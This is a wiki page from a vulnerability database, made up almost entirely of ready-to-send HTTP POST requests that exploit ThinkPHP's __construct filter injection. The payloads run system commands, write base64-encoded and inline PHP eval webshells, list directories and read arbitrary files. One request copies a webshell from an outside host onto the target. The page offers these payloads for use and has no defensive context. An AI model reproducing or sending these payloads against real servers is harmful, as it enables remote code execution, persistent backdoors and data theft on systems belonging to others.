Loading
0

ThinkPHP Payload

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

, 

POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1
Host: aaa.kkt99.top
Content-Length: 76
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=15c58ldpm65a12094fik2aul60; UM_distinctid=16ec5c84963499-0179aed780904e-2393f61-384000-16ec5c8496494d; CNZZDATA1271205468=1873186741-1575275639-%7C1575275639
Connection: close

_method=__construct&filter=assert&method=GET&server%5BREQUEST_METHOD%5D=Fuck

_method=construct&filter=assert&filter=file_put_contents('0.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))&server=-1

_method=__construct&filter=system&method=GET&get=whoami

_method=__construct&filter=assert&server=phpinfo&get=phpinfo 
or
_method=__construct&filter=call_user_func&server=phpinfo&get=phpinfo

PHP 7.4 Getshell: 

POST /%3f><%3fphp%20eval($_GET1);%3f>/controller/Index.php?1=phpinfo(); HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

_method=__construct&method=GET&server=1&filter=think\Build::module&get=index//../../public//?><?php eval($_GET1);?>

列举目标: 

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

_method=__construct&filter=scandir&filter=var_dump&method=GET&get=/www/wwwroot/adada.com/public/

PHP7.4任意文件读取: 

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

_method=__construct&filter=highlight_file&method=GET&get=/www/wwwroot/adada.com/public/index.php

PWNWIK.COM==免费、自由、人人可编辑的漏洞库